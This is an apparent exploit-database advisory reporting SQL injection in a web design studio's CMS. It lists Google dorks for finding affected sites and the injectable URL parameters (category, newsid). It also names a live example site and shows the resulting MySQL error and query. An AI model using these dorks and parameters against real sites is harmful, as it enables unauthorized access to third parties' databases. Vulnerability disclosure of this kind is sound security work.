Media-Art.ir HaaYahoo Web Design Studio Iran طراحی و اجرا: هنر رسانه SQL Injection Vulnerability

2018.10.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

############################################################################################################## # Exploit Title : Media-Art.ir HaaYahoo Web Design Studio Iran طراحی و اجرا: هنر رسانه SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 30/09/2018 # Vendor Homepage : media-art.ir ~ haayahoo.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ############################################################################################################## # Google Dorks : intext:''طراحی و اجرا: هنر رسانه'' intext:''مجری سایت: هنررسانه'' intext:''طراحی و توسعه هیاهـو'' # SQL Injection Exploits : /newspaper/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection] /newspaper/index.php?year=%7Bdate-year%7D&month=%7Bdate-month%7D&day=%7Bdate-day%7D&category=[SQL Injection] /news/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection] /PATH/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection] /index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection] /newspaper/index.php?newsid=[SQL Injection] /newspaper/engine/print.php?newsid=[SQL Injection] /index.php?newsid=[SQL Injection] ############################################################################################################## # Example Vulnerable Site => jahansanat.ir/newspaper/index.php?year=1396&month=01&day=28&category=[SQL] => [ Proof of Concept ] => archive.is/YXXPC # SQL Database Error => MySQL error in file: /engine/modules/show.short.php at line 65 Error Number: 1064 The Error returned was: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND date < '2017-04-17' + INTERVAL 24 HOUR AND approve=1 AND date < '2018-09-30 ' at line 1 SQL query: SELECT p.id, p.autor, p.date, p.short_story, CHAR_LENGTH(p.full_story) as full_story, p.xfields, p.title, p.category, p.alt_name, p.comm_num, p.allow_comm, p.fixed, p.tags, e.news_read, e.allow_rate, e.rating, e.vote_num, e.votes, e.view_edit, e.editdate, e.editor, e.reason FROM dle_post p LEFT JOIN dle_post_extras e ON (p.id=e.news_id) WHERE date >= '2017-04-17' AND category= AND date < '2017-04-17' + INTERVAL 24 HOUR AND approve=1 AND date < '2018-09-30 03:13:55' ORDER BY date DESC LIMIT 0,1 ############################################################################################################## # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################

References:

https://www.cyberizm.org/cyberizm-media-art-haayahoo-%D8%B7%D8%B1%D8%A7%D8%AD%DB%8C-%D9%88-%D8%A7%D8%AC%D8%B1%D8%A7-%D9%87%D9%86%D8%B1-%D8%B1%D8%B3%D8%A7%D9%86%D9%87-sql-inj.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top